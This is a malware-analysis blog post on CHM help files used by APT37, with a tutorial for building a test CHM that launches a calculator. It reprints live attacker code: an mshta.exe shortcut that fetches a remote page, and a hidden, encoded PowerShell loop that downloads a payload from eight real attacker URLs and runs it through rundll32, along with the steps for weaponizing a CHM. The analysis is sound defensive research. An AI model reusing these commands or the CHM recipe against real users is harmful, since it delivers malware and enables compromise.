Description

Monkey See Monkey Do, I wonder how the CHiMpanzee drool.

I have came across a few tweets in the past week with CHM file being used as part of an attack chain which I had no knowledge about. Therefore, this post is used to explore some samples to find out a little more about Compiled HTML Help files A.K.A HTMLHelp. Additionally, to better understand, I have also documented a method to replicate one of the samples to spawn a calculator instead.

What is CHM

CHM is a file format consisting of collection of HTML pages. It is also an archive of files. It is a Microsoft-proprietary format used to deliver โ€œhelpโ€ like documentation, tutorials and other resources. All of these are packed into a single compressed file which are commonly used in software help documentation.

We can also recognize chm files via the header value ITSF. From the hex dump, we can also see some HTML files which would be part of the Table of Contents.hhc.

The following shows example files from the malware sample listed in the sample overview.

Commands

This section explores at least two methods of usage of commands in chm files for delivering malware payload in an attack chain.

Running MSHTA.exe - (APT37)

Letโ€™s look at the first example used by APT37.

Sample Overview

The following chm is present in VirusTotal which is used by APT37.

NameSHA256
pay_202201_5_02-10424.chm9fdc4b3d6fbccc1abd8a08acd52b6380627e350faa99fcc348e5ed366c7b37af

Extracted Archive

The following shows some of the items that were found in this compressed file. We can also make use of HTTP Help Workshop Tool to โ€œdecompileโ€ as well. You can do so by clicking on File > decompile to set the compiled help file and the output location to place the extracted files.

An Attack Chain by APT37

The attack chain diagram is taken from ZScalarโ€™s post.

Table of Contents.hhc

This .hhc file is used to define the table of contents and navigation for a CHM file. This gives structure, potentially URLs or file links which leads to malicious resources. We can read more about the contents from Microsoft documentation.

Here is what is in the Table of Contents.hhc file:

<!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML//EN">
<HTML>
<HEAD>
<meta name="GENERATOR" content="Microsoft&reg; HTML Help Workshop 4.1">
<!-- Sitemap 1.0 -->
</HEAD><BODY>
<OBJECT type="text/site properties">
	<param name="FrameName" value="1">
	<param name="Window Styles" value="0x800025">
	<param name="ImageType" value="Folder">
</OBJECT>
<UL>
	<LI> <OBJECT type="text/sitemap">
		<param name="Name" value="Start">
		<param name="Local" value="Start.html">
		</OBJECT>
	<LI> <OBJECT type="text/sitemap">
		<param name="Name" value="Main">
		<param name="Local" value="Main.html">
		</OBJECT>
</UL>
</BODY></HTML>

Start.html

This is the first file that gets rendered. The Command here is ShortCut. A Button object with id x is created as a button which handles the shortcut. One of the item being a command to run mshta.exe to execute the 9.html. Unfortunately, I am not able to find the original 9.html on VirusTotal. However, that gives a really good idea about how chm files are used as part of the chain when delivering malware.

<HTML>
<TITLE>  ๏ฟฝ๏ฟฝ๏ฟฝ๏ฟฝ๏ฟฝ๏ฟฝ๏ฟฝ๏ฟฝ๏ฟฝ๏ฟฝ๏ฟฝ๏ฟฝ๏ฟฝ๏ฟฝ  </TITLE>
<HEAD>
</HEAD>
<BODY>
<H1 align=center>   ๏ฟฝ๏ฟฝ๏ฟฝ๏ฟฝ๏ฟฝ๏ฟฝ๏ฟฝ๏ฟฝ๏ฟฝ๏ฟฝ๏ฟฝ๏ฟฝ๏ฟฝ๏ฟฝ </h1>
<br>
<OBJECT id=x classid="clsid:adb880a6-d8ff-11cf-9377-00aa003b7a11" width=1 height=1>
<PARAM name="Command" value="ShortCut">
<PARAM name="Button" value="Bitmap::shortcut">
<PARAM name="Item1" value=",mshta.exe,http://attiferstudio.com/install.bak/sony/9.html ,">
<PARAM name="Item2" value="273,1,1">
</OBJECT>
<script>
x.Click();
location.href="Main.html";
</SCRIPT>
</BODY>
</HTML>
Suspicious Network IOC
DomainPort
attiferstudio.]com/install.]bak/sony/9.]html80
This domain is marked as malicious by Mandiant.

According to Shortcut | Microsoft Learn:

Note

Creates a shortcut to a specified action by passing Windows-based messages and parameters. For example, if a topic discusses a procedure that involves a specific dialog box, you can provide a link that a user can click in the topic to open the dialog box in the program.

The following shows the output in FakeNet tool

11/13/24 11:59:48 PM [    HTTPListener80]   GET /install.bak/sony/9.html HTTP/1.1
11/13/24 11:59:48 PM [    HTTPListener80]   Accept: */*
11/13/24 11:59:48 PM [    HTTPListener80]   Accept-Language: en-SG
11/13/24 11:59:48 PM [    HTTPListener80]   UA-CPU: AMD64
11/13/24 11:59:48 PM [    HTTPListener80]   Accept-Encoding: gzip, deflate
11/13/24 11:59:48 PM [    HTTPListener80]   User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 10.0; Win64; x64; Trident/7.0; .NET4.0C; .NET4.0E; .NET CLR 2.0.50727; .NET CLR 3.0.30729; .NET CLR 3.5.30729)
11/13/24 11:59:48 PM [    HTTPListener80]   Host: attiferstudio.com
11/13/24 11:59:48 PM [    HTTPListener80]   Connection: Keep-Alive
11/13/24 11:59:48 PM [    HTTPListener80]

Main.html

This file contains the JavaScript Payload obfuscated which can be de-obfuscated with https://obf-io.deobfuscate.io/.

We can see a stark difference between the obfuscated and de-obfuscated code.

Obfuscated Code

De-obfuscated

The string array here give hints that there are further encoding end decoding that needs to be done. Furthermore, there seem to be some cryptographic operations performed as well as some hints of this sample being a download. It seems to also deal with different browser types and has different ways to deal with download blob data. As de-obfuscation isnโ€™t the main focus, I wonโ€™t be dealing with it here.

Copyright(C) 2014 rimesoft.com string looks interesting but I have found just one available entry on Google.

http://windowfin.com/bbs/board.php/board.php?bo_table=windowfin&wr_id=592329 links to windowsexeAllkiller.com. This domain is hosted in Kakao Corp.

The hash there seems legitimate according to Virustotal - ec386aa4a8e53033f92b80291c51e8b4. Furthermore, we see the neolook@gmail.]com string as well in the full string listing.

Full _0x11db String Array

var _0x11db = ["str2bin", "bin2str", "hex2bin", "bin2hex", "encode64", "decode64", "UTF8Decode", "UTF8Encode", "insertJS", "length", "charCodeAt", "", "fromCharCode", "0x", "indexOf", "0X", "substring", "replace", "floor", "slice", "0", "ABCDEFGHIJKLMNOPQRSTUVWXYZabcdefghijklmnopqrstuvwxyz0123456789+/=", "charAt", "split", "join", "=", "\n", "head", "getElementsByTagName", "script", "createElement", "type", "text/javascript", "text", "appendChild", "hostname", "location", "protocol", "host", "pathname", "callLicense", "checkLicense1", "checkLicense2", "aaa", "bbb", "ccc", "ddd", "a : ", ", b : ", ", c : ", ", d : ", "innerHTML", "rime_jsguard_license", "getElementById", "Copyright(C) 2014 rimesoft.com. All rights reserved.", "rime_jsguard_licenseCheck", "By Sim,Jaehoon <[email protected]", "getDay", "Today is Sunday", "Today is Monday", "Today is Tuesday", "Today is Wednesday", "Today is Thursday", "Today is Friday", "Today is Saturday", "demo", "0123456789abcdef", "sha256", "sha256_self_test", "message digest", "f7846f55cf23e14eebeab5b4e1550cad5b509e3348fbc4efa3a1413d393cb650", "keySize", "numberOfRounds", "masterKey", "encRoundKeys", "decRoundKeys", "(Error)setupEncRoundKeys1 : Wrong Key Size.", "(Error)setupEncRoundKeys2 : Wrong Key.", "(Error)setupDecRoundKeys1 : Wrong Key Size.", "(Error)setupDecRoundKeys2 : Wrong Key.", "(Error)encrypt : Wrong Key Size.", "(Error)encrypt : Wrong Key.", "(Error)decrypt : Wrong Key Size.", "(Error)decrypt : Wrong Key.", "ceil", " ", "* ", " \n", "object", "number", "string", "concat", "Error: Wrong Key Size5.", "(Error)setKey : Wrong Key.", "getKeySize", "encrypt", "CBC", "ECB", "decrypt", "LITTLE", "BIG", "ENDIAN", "(Error)setupRoundKeys1 : Wrong Key Size.", "(Error)setupRoundKeys2 : Wrong Key.", "(Error)encryptSeed1 : Wrong Key Size.", "(Error)encryptSeed2 : Wrong Key.", "(Error)decryptSeed1 : Wrong Key Size.", "(Error)decryptSeed2 : Wrong Key.", "SEED ERR 001", "SEED ERR 002", "SEED ERR 003", "/", "//", "COPYRIGHT", "Co", "pyr", "ig", "ht(", "C) 2", "1", "4 ri", "me", "so", "ft.co", "m. A", "ll r", "igh", "ts re", "ser", "ve", "d.", "PROCESS", "substr", "<!-- -->", "<!--LIC_TO RIMESOFT-->", "unisafe_smail_process", "<!--LIC_TO", "unisafe_attach_process", "unisafe_smail_process_online_v01", "์„œ๋ฒ„ ์ ‘์† ์ •๋ณด๊ฐ€ ์—†์Šต๋‹ˆ๋‹ค.\n์ •์ƒ์ ์ธ ๋ณด์•ˆ ๋ฉ”์ผ์ด ์•„๋‹™๋‹ˆ๋‹ค.", "unisafe_attach_process_online_v01", "&hash_data=", "&jsoncallback=?", "Result", ",", "OK", "์„œ๋ฒ„๋กœ๋ถ€ํ„ฐ ๋ฐ›์€ ๊ฐ’์ด ์ •์ƒ์ ์ด์ง€ ์•Š์Šต๋‹ˆ๋‹ค(03).\n", "neolook_test==>", "์„œ๋ฒ„๋กœ๋ถ€ํ„ฐ ๋ฐ›์€ ๊ฐ’์ด ์ •์ƒ์ ์ด์ง€ ์•Š์Šต๋‹ˆ๋‹ค(02).\n", "์„œ๋ฒ„๋กœ๋ถ€ํ„ฐ ๋ฐ›์€ ๊ฐ’์ด ์ •์ƒ์ ์ด์ง€ ์•Š์Šต๋‹ˆ๋‹ค(01).\n", "(์ˆ˜์‹ ๋œ ๊ฐ’์ด ์—†์Œ)", "getJSON", "%20", "abort", "์ธํ„ฐ๋„ท์— ์—ฐ๊ฒฐ๋˜์–ด ์žˆ์ง€ ์•Š์€ ๊ฒฝ์šฐ ๋ณด์•ˆ๋ฉ”์ผ ์—ด๋žŒ์ด ๋ถˆ๊ฐ€๋Šฅํ•ฉ๋‹ˆ๋‹ค.", "match", "userAgent", "application/octet-stream", "safari", "toLowerCase", "chrome", "Safari์˜ ๊ฒฝ์šฐ ์ด๋ฆ„์„ ๋ณ€๊ฒฝํ•  ์ˆ˜ ์—†์œผ๋ฉฐ,\n", "์‚ฌ์šฉ์ž์˜ ๋‹ค์šด๋กœ๋“œ ํด๋”์— Unknown ๋˜๋Š” Unknown-์ˆซ์ž ํ˜•์‹์œผ๋กœ ์ €์žฅ๋ฉ๋‹ˆ๋‹ค.\n\n", "์™„๋ฃŒ ํ›„ ๋‹ค์šด๋กœ๋“œ ํด๋”์˜ Unknown ํŒŒ์ผ์„ \n", "[ ", " ]๋กœ\n", "๋ฐ”๊พผ ๋‹ค์Œ ์‚ฌ์šฉํ•˜์‹œ๊ธฐ ๋ฐ”๋ž๋‹ˆ๋‹ค.\n\n", "[์ฃผ์˜ : ํฐ ํŒŒ์ผ(3MB ์ด์ƒ)์ผ ๊ฒฝ์šฐ safari๊ฐ€ ๋‹ค์šด๋  ์ˆ˜ ์žˆ์Šต๋‹ˆ๋‹ค.]", "application/octet-stream;base64,", "data:", "a", "download", "setAttribute", "href", "display", "style", "none", "onclick", "target", "removeChild", "body", "MouseEvent", "createEvent", "click", "initEvent", "dispatchEvent", "BlobBuilder", "WebKitBlobBuilder", "MozBlobBuilder", "MSBlobBuilder", "name", "TypeError", "append", "getBlob", "InvalidStateError", "unsupported browser", "msSaveBlob", "navigator", "Download File", "webkitURL", "firefox", "createObjectURL", "URL", "SEED-CBC", "write", "128"];
Translations
  • ์„œ๋ฒ„ ์ ‘์† ์ •๋ณด๊ฐ€ ์—†์Šต๋‹ˆ๋‹ค.\n์ •์ƒ์ ์ธ ๋ณด์•ˆ ๋ฉ”์ผ์ด ์•„๋‹™๋‹ˆ๋‹ค.
    • There is no server connection information. This is not legitimate secure mail.
  • ์„œ๋ฒ„๋กœ๋ถ€ํ„ฐ ๋ฐ›์€ ๊ฐ’์ด ์ •์ƒ์ ์ด์ง€ ์•Š์Šต๋‹ˆ๋‹ค(03).
    • The value received from the server is not normal (03).
  • ์„œ๋ฒ„๋กœ๋ถ€ํ„ฐ ๋ฐ›์€ ๊ฐ’์ด ์ •์ƒ์ ์ด์ง€ ์•Š์Šต๋‹ˆ๋‹ค(02).
    • The value received from the server is not normal (02).
  • ์„œ๋ฒ„๋กœ๋ถ€ํ„ฐ ๋ฐ›์€ ๊ฐ’์ด ์ •์ƒ์ ์ด์ง€ ์•Š์Šต๋‹ˆ๋‹ค(01)
    • The value received from the server is not normal (01)
  • (์ˆ˜์‹ ๋œ ๊ฐ’์ด ์—†์Œ)
    • (no value received)
  • ์ธํ„ฐ๋„ท์— ์—ฐ๊ฒฐ๋˜์–ด ์žˆ์ง€ ์•Š์€ ๊ฒฝ์šฐ ๋ณด์•ˆ๋ฉ”์ผ ์—ด๋žŒ์ด ๋ถˆ๊ฐ€๋Šฅํ•ฉ๋‹ˆ๋‹ค.
    • If youโ€™re not connected to the internet, you canโ€™t view your secure mail.
  • Safari์˜ ๊ฒฝ์šฐ ์ด๋ฆ„์„ ๋ณ€๊ฒฝํ•  ์ˆ˜ ์—†์œผ๋ฉฐ,
    • For Safari, you canโ€™t rename it,
  • ์‚ฌ์šฉ์ž์˜ ๋‹ค์šด๋กœ๋“œ ํด๋”์— Unknown ๋˜๋Š” Unknown-์ˆซ์ž ํ˜•์‹์œผ๋กœ ์ €์žฅ๋ฉ๋‹ˆ๋‹ค.
    • It is saved in the userโ€™s Downloads folder in an Unknown or Unknown-number format.
  • ์™„๋ฃŒ ํ›„ ๋‹ค์šด๋กœ๋“œ ํด๋”์˜ Unknown ํŒŒ์ผ์„
    • After completion, move the Unknown file in the Downloads folder to the
  • ๋ฐ”๊พผ ๋‹ค์Œ ์‚ฌ์šฉํ•˜์‹œ๊ธฐ ๋ฐ”๋ž๋‹ˆ๋‹ค.
    • before using it.
  • [์ฃผ์˜ : ํฐ ํŒŒ์ผ(3MB ์ด์ƒ)์ผ ๊ฒฝ์šฐ safari๊ฐ€ ๋‹ค์šด๋  ์ˆ˜ ์žˆ์Šต๋‹ˆ๋‹ค.]
    • [Caution: large files (3MB or more) may cause safari to crash].

Different Sample, Same IOC by ZScalar

In this analysis, the same suspicious IOC was also used which is attributed to APT37 which targets South Korean Entities. Blog by ZScalar has included many chm hashes that we can reference as well.

Their chm file also downloads a similar filename 9.html .

Here is another example of a help window showing text in Korean and getting from same domain but a 10.html.

Running Powershell.exe

Letโ€™s look at another example where instead of using mshta.exe, it made use of powershell commands to run encoded scripts.

Sample Overview

The following chm is present in VirusTotal which is used by APT37.

NameSHA256
README-yD8348.chm)4e52c186ef4cbfc9249cd03416f17825138b449bcaddd7b79fe9a89b898d67fd

From the content preview, we can some sus html files. They are propagandising.htm and the README-yD8348.hhc which is the structure for chm.

README-yD8348.hhc

This masquerades as a help documents that gives instruction on some IP settings.

Here is the content in the .hhc file.

<!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML//EN">
<HTML>
<HEAD>
<meta name="GENERATOR" content="Microsoft&reg; HTML Help Workshop 4.1">
<!-- Sitemap 1.0 -->
</HEAD><BODY>
  <UL>
  <LI> <OBJECT type="text/sitemap">
      <param name="Name" value="IPv4 Advanced IP Settings Tab">
      <param name="Local" value="README-yD8348.htm">
  </OBJECT>
  </UL>
  <UL>
  <LI> <OBJECT type="text/sitemap">
      <param name="Name" value="IPv4 Advanced WINS Tab">
      <param name="Local" value="propagandising.htm">
  </OBJECT>
  </UL>
  <UL>
  <LI> <OBJECT type="text/sitemap">
      <param name="Name" value="IPv4 Alternate Configuration Tab">
      <param name="Local" value="README-yD8348.htm">
  </OBJECT>
  </UL>
  <UL>
  <LI> <OBJECT type="text/sitemap">
      <param name="Name" value="IPv4 and IPv6 Advanced DNS Tab">
      <param name="Local" value="propagandising.htm">
  </OBJECT>
  </UL>
</BODY>
</HTML>
 

README-yD8348.htm

The propagandising.htm does not seem to contain anything suspicious. However, the README-yD8348.htm contains Button objects with Command to a ShortCut similar to what we have seen previously.

Encoded Command

This chunk of encoded command contains the 8 attacker domains addresses.

<HTML>
<TITLE>Check for Windows updates from Command Line</TITLE>
<HEAD>
</HEAD>
<BODY>
<OBJECT id=x classid="clsid:adb880a6-d8ff-11cf-9377-00aa003b7a11" width=1 height=1>
<PARAM name="Command" value="ShortCut">
 <PARAM name="Button" value="Bitmap::shortcut">
 <PARAM name="Item1" value=",cmd.exe,/c C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe -WindowStyle Hidden -ExecutionPolicy Bypass -NoLogo -NoProfile -encodedcommand UwB0AGEAcgB0AC0AUwBsAGUAZQBwACAALQBTAGUAYwBvAG4AZABzACAANQA7ACQAQQBuAG4AZQB4AGUAZABNAGEAbQBpAGwAbABhACAAPQAgACgAIgBoAHQAdABwAHMAOgAvAC8AbQByAGMAcgBpAHoAcQB1AG4AYQAuAGMAbwBtAC8ATAA3AGMAYwBOAC8AegBkAHAAMQBYAHYAQwBiADYALABoAHQAdABwAHMAOgAvAC8AbgBhAHkAYQBkAG8AZgBvAHUAbgBkAGEAdABpAG8AbgAuAG8AcgBnAC8AdwBYAGEASwBtAC8AQQBHAEkAZgA3AGgAQQB1AGcALABoAHQAdABwAHMAOgAvAC8AZwBzAHMAYwBvAHIAcABvAHIAYQB0AGkAbwBuAGwAdABkAC4AYwBvAG0ALwBvAGsAUwBmAGoALwBpADYAdAA5AGcAdQBwACwAaAB0AHQAcABzADoALwAvAGgAbwB0AGUAbABsAG8AcwBtAGkAcgB0AG8AcwAuAGMAbwBtAC8AcwBqAG4ALwBjAGoAOABvAFUATgAsAGgAdAB0AHAAcwA6AC8ALwBjAGEAcgBsAGEAZAB2AG8AZwBhAGQAYQB0AHIAaQBiAHUAdABhAHIAaQBhAC4AYwBvAG0ALwB0AHYAbgBxADkALwBzAGkAZQA4ADcALABoAHQAdABwAHMAOgAvAC8AegBhAGkAbgBjAG8ALgBuAGUAdAAvAE8AZABPAFUALwB6AG4AbABRAGYAUgBqAGoAOQBFAHcAaQAsAGgAdAB0AHAAcwA6AC8ALwBjAGkAdAB5AHQAZQBjAGgALQBzAG8AbAB1AHQAaQBvAG4AcwAuAGMAbwBtAC8ANgBNAGgAMQBrAC8AQQA3AHIAaQBYADMAMAB5AHUALABoAHQAdABwAHMAOgAvAC8AZQByAGcALQBlAGcALgBjAG8AbQAvAG8AYwBtAGIALwB6AGQAegB0AEsARgBDAEgAMQBIACIAKQAuAHMAcABsAGkAdAAoACIALAAiACkAOwBmAG8AcgBlAGEAYwBoACAAKAAkAG0AZQByAGMAdQByAGkAZAAgAGkAbgAgACQAQQBuAG4AZQB4AGUAZABNAGEAbQBpAGwAbABhACkAIAB7AHQAcgB5ACAAewB3AGcAZQB0ACAAJABtAGUAcgBjAHUAcgBpAGQAIAAtAFQAaQBtAGUAbwB1AHQAUwBlAGMAIAAxADUAIAAtAE8AIAAkAGUAbgB2ADoAVABFAE0AUABcAHcAYQB5AGYAYQByAGUAcgBzAEMAbwBvAHAAdABlAGQALgBhAG4AZQBtAG8AbgBpAG4AUABhAHIAYQBiAG8AbABpAHoAZQA7AGkAZgAgACgAKABHAGUAdAAtAEkAdABlAG0AIAAkAGUAbgB2ADoAVABFAE0AUABcAHcAYQB5AGYAYQByAGUAcgBzAEMAbwBvAHAAdABlAGQALgBhAG4AZQBtAG8AbgBpAG4AUABhAHIAYQBiAG8AbABpAHoAZQApAC4AbABlAG4AZwB0AGgAIAAtAGcAZQAgADEAMAAwADAAMAAwACkAIAB7AHAAbwB3AGUAcgBzAGgAZQBsAGwAIAAtAFcAaQBuAGQAbwB3AFMAdAB5AGwAZQAgAEgAaQBkAGQAZQBuACAALQBFAHgAZQBjAHUAdABpAG8AbgBQAG8AbABpAGMAeQAgAEIAeQBwAGEAcwBzACAALQBOAG8ATABvAGcAbwAgAC0ATgBvAFAAcgBvAGYAaQBsAGUAIAAtAGUAbgBjAG8AZABlAGQAYwBvAG0AbQBhAG4AZAAgACIAYwB3AEIAMABBAEcARQBBAGMAZwBCADAAQQBDAEEAQQBjAGcAQgAxAEEARwA0AEEAWgBBAEIAcwBBAEcAdwBBAE0AdwBBAHkAQQBDAEEAQQBKAEEAQgBsAEEARwA0AEEAZABnAEEANgBBAEYAUQBBAFIAUQBCAE4AQQBGAEEAQQBYAEEAQgAzAEEARwBFAEEAZQBRAEIAbQBBAEcARQBBAGMAZwBCAGwAQQBIAEkAQQBjAHcAQgBEAEEARwA4AEEAYgB3AEIAdwBBAEgAUQBBAFoAUQBCAGsAQQBDADQAQQBZAFEAQgB1AEEARwBVAEEAYgBRAEIAdgBBAEcANABBAGEAUQBCAHUAQQBGAEEAQQBZAFEAQgB5AEEARwBFAEEAWQBnAEIAdgBBAEcAdwBBAGEAUQBCADYAQQBHAFUAQQBMAEEAQgBOAEEARwA4AEEAZABBAEIAawBBAEQAcwBBACIAOwBiAHIAZQBhAGsAOwB9AH0AYwBhAHQAYwBoACAAewBTAHQAYQByAHQALQBTAGwAZQBlAHAAIAAtAFMAZQBjAG8AbgBkAHMAIAA1ADsAfQB9AA==">
 <PARAM name="Item2" value="273,1,1">
</OBJECT>
<SCRIPT>
x.Click();
</SCRIPT>
<html DIR="LTR" xmlns:MSHelp="http://msdn.microsoft.com/mshelp" xmlns:ddue="http://ddue.schemas.microsoft.com/authoring/2003/5" xmlns:xlink="http://www.w3.org/1999/xlink" xmlns:tool="http://www.microsoft.com/tooltip"><head><META HTTP-EQUIV="Content-Type" CONTENT="text/html; CHARSET=Windows-1252"></META><META NAME="save" CONTENT="history"></META><title>IPv4 Advanced IP Settings Tab</title><link rel="stylesheet" type="text/css" href="../local/Classic.css"></link><script src="../local/script.js"></script></head><body><div id="header"><h1>IPv4 Advanced IP Settings Tab</h1></div><div id="mainSection"><div id="mainBody"><p class="runningHeader"></p>
<p>You can use the settings on this tab for this network connection only if you are not using the <b>Obtain an IP address automatically</b> on the <b>General</b> tab.</p>
<p><b>IP addresses</b> lists additional Internet Protocol version 4 (IPv4) addresses that can be assigned to this network connection. There is no limit to the number of IP addresses that can be configured. This setting is useful if this computer connects to a single physical network but requires advanced IP addressing because of either of the following reasons:</p>
...
...

The decoded PowerShell command is as follows:

Start-Sleep -Seconds 5;
$AnnexedMamilla = (
"https://mrcrizquna.com/L7ccN/zdp1XvCb6,https://nayadofoundation.org/wXaKm/AGIf7hAug,https://gsscorporationltd.com/okSfj/i6t9gup,https://hotellosmirtos.com/sjn/cj8oUN,https://carladvogadatributaria.com/tvnq9/sie87,https://zainco.net/OdOU/znlQfRjj9Ewi,https://citytech-solutions.com/6Mh1k/A7riX30yu,https://erg-eg.com/ocmb/zdztKFCH1H").split(",");
 
foreach ($mercurid in $AnnexedMamilla) {
	try {
		wget $mercurid -TimeoutSec 15 -O $env:TEMP\wayfarersCoopted.anemoninParabolize
		if ((Get-Item $env:TEMP\wayfarersCoopted.anemoninParabolize).length -ge 100000) {
			powershell -WindowStyle Hidden -ExecutionPolicy Bypass -NoLogo -NoProfile -encodedcommand "cwB0AGEAcgB0ACAAcgB1AG4AZABsAGwAMwAyACAAJABlAG4AdgA6AFQARQBNAFAAXAB3AGEAeQBmAGEAcgBlAHIAcwBDAG8AbwBwAHQAZQBkAC4AYQBuAGUAbQBvAG4AaQBuAFAAYQByAGEAYgBvAGwAaQB6AGUALABNAG8AdABkADsA";
			break;
		}
	}
	catch {
	Start-Sleep -Seconds 5;
	}
}

Suspicious Network IOC

  • hxxps://mrcrizquna.]com/L7ccN/zdp1XvCb6
  • hxxps://nayadofoundation.rg/wXaKm/AGIf7hAug
  • hxxps://gsscorporationltd.]com/okSfj/i6t9gup
  • hxxps://hotellosmirtos.]com/sjn/cj8oUN
  • hxxps://carladvogadatributaria.].com/tvnq9/sie87
  • hxxps://zainco.]net/OdOU/znlQfRjj9Ewi
  • hxxps://citytech-solutions.]com/6Mh1k/A7riX30yu
  • hxxps://erg-eg.]com/ocmb/zdztKFCH1H

FakeNet captures this and indicated signs of powershell.exe as well.

Running Downloaded Malware using rundll32

The inner powershell command to execute is:

start rundll32 $env:TEMP\wayfarersCoopted.anemoninParabolize,Motd;

Steps for Creating our own CHM file

CHM can be created with the help of HTML Help Workshop which can be downloaded from internet archive. Note that this downloaded file may be flagged by Windows Defender as a threat.

1. Create New Project

We can first start out by creating a new Project. I will name this project Fake IT HelpDesk.

When creating a new project, realize that we can have different types of file. I found that we can just skip this unless we have something done up already which we donโ€™t.

We will then be greeted with the following User Interface.

2. Creating a new Help Page

We can now create a new page by going to File > New > HTML File. I have set the name of the page to IT Help Desk.

Letโ€™s edit this script with anything you want. After that, we can save the file. I will be replacing with the following content and saving as help.htm:

<!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML//EN">
<HTML>
<HEAD>
<meta name="GENERATOR" content="Microsoft&reg; HTML Help Workshop 4.1">
<Title>IT HelpDesk</Title>
<style>
        body {
            text-align: center;
            font-family: 'Segoe UI', Tahoma, Geneva, Verdana, sans-serif;
            line-height: 1.6;
            color: #333;
            background-color: #f0f4f8;
            margin: 0;
            padding: 0;
        }
        .container {
            max-width: 800px;
            margin: 0 auto;
            padding: 20px;
        }
        header {
            background-color: #1a237e;
            color: white;
            text-align: center;
            padding: 1em 0;
            margin-bottom: 2em;
        }
        h1 {
            margin: 0;
        }
        .concept {
            background-color: white;
            border-radius: 8px;
            box-shadow: 0 4px 6px rgba(0, 0, 0, 0.1);
            margin-bottom: 2em;
            overflow: hidden;
        }
        .concept-header {
            background-color: #3949ab;
            color: white;
            padding: 1em;
        }
        .concept-content {
            padding: 1em;
        }
        .concept h2 {
            margin: 0;
        }
        .concept p {
            margin-bottom: 0;
        }
    </style>
</HEAD>
<BODY>
   <header>
        <h1>Understanding HTTP</h1>
    </header>
    <div class="container">
        <div class="concept">
            <div class="concept-header">
                <h2>What is HTTP?</h2>
            </div>
            <div class="concept-content">
                <p>HTTP (Hypertext Transfer Protocol) is the foundation of data communication on the World Wide Web. It's a protocol that allows for the transfer of data between a client (usually a web browser) and a server.</p>
            </div>
        </div>
        <div class="concept">
            <div class="concept-header">
                <h2>HTTP Methods</h2>
            </div>
            <div class="concept-content">
                <p>HTTP defines several request methods to indicate the desired action to be performed on the identified resource. The most common methods are GET (retrieve data), POST (submit data), PUT (update data), and DELETE (remove data).</p>
            </div>
        </div>
        <div class="concept">
            <div class="concept-header">
                <h2>HTTP Status Codes</h2>
            </div>
            <div class="concept-content">
                <p>HTTP status codes are three-digit numbers returned by a server in response to a client's request. They are grouped into five classes: Informational responses (100โ€“199), Successful responses (200โ€“299), Redirects (300โ€“399), Client errors (400โ€“499), and Server errors (500โ€“599).</p>
            </div>
        </div>
        <div class="concept">
            <div class="concept-header">
                <h2>HTTP Headers</h2>
            </div>
            <div class="concept-content">
                <p>HTTP headers allow the client and the server to pass additional information with the request or the response. They define the operating parameters of an HTTP transaction. Common headers include Content-Type, User-Agent, and Authorization.</p>
            </div>
        </div>
    </div>
</BODY>
</HTML>
 

3. Adding Topics

We can now add topic by clicking on the annotated button and add in the help.htm file.

You can continue to create more new pages and add it as topics in this step. I shall leave it for now. We should now be able to find the help.htm under the [FILES] section.

4. Adding to Table Of Content (TOC)

We can now click on the Contents tab. After that, we can select the Create a new contents file since we do not have any existing one. This is the hhc file just like discussed earlier. We can rename this to anything but the default seems to be Table of Contents.hhc. I will save it as the default.

5. Adding the ShortCut

We can now click on the HTML Help ActiveX Control button. This is where you can create or modify the Command that we have discussed earlier.

We can select ShortCut in the command dropdown and for this post, we wonโ€™t be using any scripting to access the command so Iโ€™ll just leave it.

I have selected the type to HIDDEN

For this program, I have set up a fake python server to run a PowerShell script to run calc.exe similar to the second example.

This are the inputs:

  • Program: cmd.exe
  • Parameters: /c C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe -WindowStyle Hidden -ExecutionPolicy Bypass -NoLogo -NoProfile -encodedcommand UwB0AGEAcgB0AC0AUAByAG8AYwBlAHMAcwAgAGMAYQBsAGMALgBlAHgAZQA=
    • โ€œStart-Process calc.exeโ€ in Unicode

Next, we can leave the Message, WPARAM and LPARAM empty for now and click Next , then Finish. We should now see the new Object being added into the source automatically at where your cursor was.

Note

We can then call the function Click on that created button

// <id_of_button>.Click()
<script> hhctrl.Click()</script>

6. Compilation

To compile, click File > compile

7. Execution

Now, we can look for our Fake_IT_HelpDesk.chm file and run it. In Windows 11 at least, it would warn it we wish to view blocked content.

Letโ€™s just assume that the user allowed to view blocked content due to compelling reason, we should see the calculator spawned!

Looking at our Newly Created CHM

Letโ€™s look at the archive:

We see our hhc file which should contain the structure for the compressed folder. Next, the help.htm is also present!

References

Annex A - Indicators Of Compromise (IOCs) by ZScalar

Lifted from: https://www.zscaler.com/blogs/security-research/unintentional-leak-glimpse-attack-vectors-apt3

Archive file hashes

MD5 hashArchive filename
3dd12d67844b047486740405ae96f1a4(20220120)2022๋…„ ์ด๋™์ฐฝํšŒ ์‹ ๋…„์ธ์‚ฌ001.rar
e9cd4c60582a587416c4807c890f8a5b(์–‘์‹) ์ œ20๋Œ€ ๋Œ€ํ†ต๋ น ์ทจ์ž„์‹ ์žฌ์™ธ๋™ํฌ ์ฐธ์„์ž ์ถ”์ฒœ ๋ช…๋‹จ(๊ตญ๋ฏผ์˜ํž˜๋‹น์› 000).rar
6dc7795dde643aae9ced8e22db335ad11.rar
e3879ea3f695706dfc3fc1fb68c6241d2017-APEC.rar
17bc6298bf72fa76ad6e3f29536e2f132022 ํ›„๊ธฐ ์‹ -ํŽธ์ž…์ƒ ๋ชจ์ง‘์š”๊ฐ•.rar
54a99efd1b9adec5dc0096c624f216602022-01-27-notification.rar
f3f4cf7876817b1e8a2d49fe9bd7b2062022-03-22.rar
bb182e47e1ffc0e8335b3263112ffdb12022-04-14.rar
9d85c8378b5f1edefb1e9837b3abb74f2022.04.27.rar
cb33ef9c824d16ff23af4e01f017e6482022.rar
75fe480a0669e80369eaf640857c27cd20220315-112_Notice.rar
6db5f68b74c8ba397104da419fcc831d202203_5_06.rar
cfd73942f61fbb14dded15f3d0c92f4a20220510_115155.rar
5c67c9266e4267d1bf0862bf2c7bd2a520220913.rar
1531bba6a8028d38d36c0a91b91159c320220916093205755684_TSA.rar
afdc59ec36ac950de08169162783accd2022๋…„ ๊ตญ๋ฐฉ๋ถ€ ๋ถ€์ž„์ด์‚ฌ ์•ˆ๋‚ด(๋ชฝ๊ณจ๋ฆฌ์•„).rar
